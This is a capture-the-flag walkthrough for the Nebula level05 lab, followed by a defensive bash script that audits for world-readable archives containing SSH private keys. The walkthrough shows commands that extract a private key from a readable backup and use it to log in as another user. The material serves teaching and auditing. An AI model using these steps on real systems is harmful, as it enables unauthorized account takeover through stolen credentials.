Weak permissions
Nebula 05 Agenda: “Check the flag05 home directory. You are looking for weak directory permissions”
1 level05@nebula:~$ cd /home/flag05
2 level05@nebula:/home/flag05$ ls -la
3 total 5
4 drwxr-x--- 4 flag05 level05 93 2012-08-18 06:56 .
5 drwxr-xr-x 1 root root 100 2012-08-27 07:18 ..
6 drwxr-xr-x 2 flag05 flag05 42 2011-11-20 20:13 .backup
7 -rw-r--r-- 1 flag05 flag05 220 2011-05-18 02:54 .bash_logout
8 -rw-r--r-- 1 flag05 flag05 3353 2011-05-18 02:54 .bashrc
9 -rw-r--r-- 1 flag05 flag05 675 2011-05-18 02:54 .profile
10 drwx------ 2 flag05 flag05 70 2011-11-20 20:13 .ssh
11
12 level05@nebula:/home/flag05$ cd ./.backup/
13 level05@nebula:/home/flag05/.backup$ ls -la
14 total 2
15 drwxr-xr-x 2 flag05 flag05 42 2011-11-20 20:13 .
16 drwxr-x--- 4 flag05 level05 93 2012-08-18 06:56 ..
17 -rw-rw-r-- 1 flag05 flag05 1826 2011-11-20 20:13 backup-19072011.tgz
18
19 level05@nebula:/home/flag05/.backup$ file backup-19072011.tgz
20 backup-19072011.tgz: gzip compressed data, from Unix, last modified:
21 Tue Jul 19 02:38:48 2011
22
23 level05@nebula:/home/flag05/.backup$ mkdir /tmp/flag05/
24 level05@nebula:/home/flag05/.backup$ cd /tmp/flag05/
25
26 level05@nebula:/tmp/flag05$ tar -xzvf /home/flag05/.backup/backup-19072011.tgz
27 .ssh/
28 .ssh/id_rsa.pub
29 .ssh/id_rsa
30 .ssh/authorized_keys

So the “weak” directory was the hidden “/home/flag05/.backup” folder: it is readable and traversable by everyone (drwxr-xr-x) and the archive inside it is world-readable (-rw-rw-r--), while the real “.ssh” directory is locked down (drwx------). We extracted the archive with the tar utility (line #26), which gave us the public (“id_rsa.pub”) and private (“id_rsa”) SSH RSA keys. In an asymmetric key encryption scheme, anyone can encrypt messages using the public key, but only the holder of the paired private key can decrypt. Security depends on the secrecy of the private key. Now we can use the OpenSSH client with the private key as the identity file to log in as the “flag05” user:
1 level05@nebula:/tmp/flag05$ ssh -i ./.ssh/id_rsa flag05@localhost
2
3 flag05@nebula:~$ getflag
4 You have successfully executed getflag on a target account
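
To find this kind of exposure on your own hosts, the following audit script (an added example, not part of the original walkthrough) reports tar archives that are readable by "other" and contain SSH private key material. The function names, the archive extensions searched and the fixture contents are assumptions chosen for illustration, and the key in the fixture is a constructed placeholder.

```bash
#!/usr/bin/env bash
# Audit a directory tree for tar archives that other local users can read
# and that contain SSH private key material.

# Print "<archive>: <member>" for each private key in an other-readable archive.
audit_exposed_keys() {
    local root=$1 archive member
    # -perm -o=r matches files whose mode grants read to "other",
    # like the -rw-rw-r-- backup in the listing above.
    find "$root" -type f -perm -o=r \
        \( -name '*.tgz' -o -name '*.tar.gz' -o -name '*.tar' \) 2>/dev/null |
    while IFS= read -r archive; do
        tar -tf "$archive" 2>/dev/null | while IFS= read -r member; do
            case $member in */) continue ;; esac   # skip directory entries
            # Identify keys by their PEM header, not by file name.
            if tar -xOf "$archive" "$member" 2>/dev/null | head -n 1 |
                grep -q -e '-----BEGIN .*PRIVATE KEY-----'; then
                printf '%s: %s\n' "$archive" "$member"
            fi
        done
    done
}

# Build a constructed fixture mirroring the page's layout (placeholder key).
make_fixture() {
    local dir
    dir=$(mktemp -d) || return 1
    mkdir -p "$dir/src/.ssh" "$dir/home/.backup"
    printf '%s\n' '-----BEGIN RSA PRIVATE KEY-----' 'CONSTRUCTED-NOT-A-KEY' \
        '-----END RSA PRIVATE KEY-----' > "$dir/src/.ssh/id_rsa"
    printf 'ssh-rsa CONSTRUCTED example\n' > "$dir/src/.ssh/id_rsa.pub"
    tar -czf "$dir/home/.backup/backup.tgz" -C "$dir/src" .ssh
    chmod 664 "$dir/home/.backup/backup.tgz"   # weak: readable by other
    printf '%s\n' "$dir"
}

fixture=$(make_fixture)
audit_exposed_keys "$fixture/home"
rm -rf "$fixture"
```

The check looks only at the archive's own mode bits; whether another user can actually reach the file also depends on the permissions of every parent directory.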